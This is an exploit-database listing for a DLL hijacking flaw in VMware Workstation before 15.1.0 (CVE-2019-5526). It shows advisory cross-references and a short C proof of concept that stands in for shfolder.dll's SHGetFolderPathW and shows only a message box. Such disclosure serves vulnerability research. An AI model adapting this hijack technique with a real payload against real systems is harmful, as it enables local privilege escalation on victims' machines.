VMware Workstation 15.1.0 - DLL Hijacking Exploit

🗓️ 16 May 2019 00:00:00Reported by Miguel MendezType

zdt🔗 0day.today👁 166 Views

VMware Workstation 15.1.0 - DLL Hijacking Exploit CVE-2019-552

Reporter	Title	Published	Views	Family All 15
BDU FSTEC	The vulnerability of VMware Workstation’s virtualization platform, related to errors during DLL file loading, allows attackers to escalate their privileges.	4 Jul 201900:00	–	bdu_fstec
Circl	CVE-2019-5526	16 May 201900:00	–	circl
CVE	CVE-2019-5526	15 May 201915:18	–	cve
Cvelist	CVE-2019-5526	15 May 201915:18	–	cvelist
Exploit DB	VMware Workstation 15.1.0 - DLL Hijacking	16 May 201900:00	–	exploitdb
EUVD	EUVD-2019-15101	3 Oct 202520:07	–	euvd
exploitpack	VMware Workstation 15.1.0 - DLL Hijacking	16 May 201900:00	–	exploitpack
Kaspersky	KLA12116 PE vulnerability in VMware Workstation and Player	14 May 201900:00	–	kaspersky
NVD	CVE-2019-5526	15 May 201916:29	–	nvd
Packet Storm	VMware Workstation DLL Hijacking	16 May 201900:00	–	packetstorm

#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------


Description:

VMware Workstation contains a DLL hijacking issue because some DLL.


DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()

------Code_Poc-------
#include "dll.h"
#include <windows.h>

DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}

--------------------------


https://www.vmware.com/security/advisories/VMSA-2019-0007.html

#  0day.today [2019-05-21]  #

16 May 2019 00:00Current

0.5Low risk

Vulners AI Score0.5

EPSS0.0683